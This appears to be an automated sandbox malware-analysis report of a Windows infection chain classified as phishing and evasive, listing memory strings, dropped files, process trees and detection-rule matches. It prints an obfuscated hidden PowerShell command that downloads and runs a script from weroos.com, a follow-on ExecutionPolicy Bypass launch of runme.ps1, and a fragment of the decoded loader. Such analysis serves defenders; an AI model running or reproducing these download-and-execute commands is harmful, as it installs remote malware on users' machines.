00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2BAE5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000013.00000002.1686220805.000001CE36711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2B681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2BAE5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000013.00000002.1686220805.000001CE37D4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://weroos.com
Source: powershell.exe, 00000014.00000002.2426086444.0000025F298A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://wsoft.com
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000014.00000002.2450559465.0000025F44830000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D48A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.python.org
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.pythonlabs.com/logos.html
Source: python.exe, 00000018.00000003.2072269174.0000023C74402000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.unicode.org/book/ch03.pdf
Source: powershell.exe, 00000013.00000002.1686220805.000001CE37D4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1686220805.000001CE37D6F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://a.nel.cloudflare.com/report/v4?s=QghPBNdzUgTrevgZUhntZq2goAA8bDA9b9DS3h0nILEowfQX883iDCeTRY1
Source: powershell.exe, 00000013.00000002.1686220805.000001CE36711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2B681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2BAE5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C0BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bootstrap.pypa.io
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bootstrap.pypa.io/get-pip.py
Source: powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: python.exe, 00000018.00000003.2023980303.0000023C74393000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2024935913.0000023C74393000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2022940624.0000023C74393000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2016923190.0000023C74378000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/kennethreitz/requests/pull/2567.
Source: python.exe, 00000018.00000003.2067241943.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2063316044.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2031495522.0000023C7436A000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2078461681.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2055692185.0000023C7436C000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2072269174.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2101837162.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2075816910.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2065656418.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2060621815.0000023C7436B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2027368506.0000023C74356000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2058908335.0000023C7436B000.00000004.00000020.00020000.00000000.sdmp, python.exe, 00000018.00000003.2069870001.0000023C7436D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pygments/pygments/archive/master.zip#egg=Pygments-dev
Source: python.exe, 00000018.00000003.2013835157.0000023C74203000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/pypa/pip/issues/7498.
Source: powershell.exe, 00000013.00000002.1686220805.000001CE37569000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000013.00000002.1689899872.000001CE468C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1689899872.000001CE46785000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2446521559.0000025F3B6F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://opensource.org
Source: powershell.exe, 00000013.00000002.1686220805.000001CE37569000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1686220805.000001CE37D46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weroos.com
Source: powershell.exe, 00000013.00000002.1686220805.000001CE36941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weroos.com/SDkwjk.txt
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weroos.com/new.py
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.apache.org/licenses/
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cnri.reston.va.us)
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cwi.nl)
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openssl.org/H
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.python.org
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/ftp/python/3.11.8/python-3.11.8-embed-amd64.zip
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/psf/)

System Summary

Source: Process Memory Space: powershell.exe PID: 5504, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_msi.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_queue.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\unicodedata.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_multiprocessing.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_hashlib.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_ssl.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\python.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\python311.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_sqlite3.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_socket.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\winsound.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\select.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\sqlite3.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\libssl-3.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_ctypes.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_decimal.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_zoneinfo.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_asyncio.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_elementtree.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_uuid.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_lzma.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_overlapped.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\vcruntime140.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\pythonw.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\vcruntime140_1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\_bz2.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\pyexpat.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\libffi-8.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\libcrypto-3.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Temp\PyEnv\python3.dll
Source: pythonw.exe.20.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.20.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.20.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: python3.dll.20.dr Static PE information: No import functions for PE file found
Source: Process Memory Space: powershell.exe PID: 5504, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.evad.win@39/1409@90/17
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Y4TFCR Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2128:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngnzao2z.fzv.ps1 Jump to behavior
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2000,i,4887704872573849148,15116561827335116035,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:3
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://flexjjet.com"
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" C:\\Temp\PyEnv\get-pip.py
Source: C:\Temp\PyEnv\python.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" -m pip install pycryptodome pypiwin32
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Temp\PyEnv\python.exe Section loaded: python311.dll Jump to behavior
Source: C:\Temp\PyEnv\python.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Temp\PyEnv\python.exe Section loaded: version.dll Jump to behavior
Source: C:\Temp\PyEnv\python.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Temp\PyEnv\python.exe Section loaded: libffi-8.dll Jump to behavior
Source: C:\Temp\PyEnv\python.exe Section loaded: libcrypto-3.dll Jump to behavior
Source: C:\Temp\PyEnv\python.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Temp\PyEnv\python.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Temp\PyEnv\python.exe Section loaded: libssl-3.dll Jump to behavior
Source: C:\Temp\PyEnv\python.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Temp\PyEnv\python.exe File opened: C:\Temp\pyvenv.cfg Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries Jump to behavior
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_elementtree.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_zoneinfo.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python.pdb source: python.exe, 00000018.00000000.1975619284.00007FF70C492000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_msi.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5B1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\winsound.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($TFlsgCfG))$obj = ConvertFrom-Json $json$paths = $obj.paths$data = $obj.data$up = Join-Path $Env:AppData 'Y4TFCR'[System.IO.Directory]::CreateDirectory($up) | Out-Nullfor ($i = 0; $i
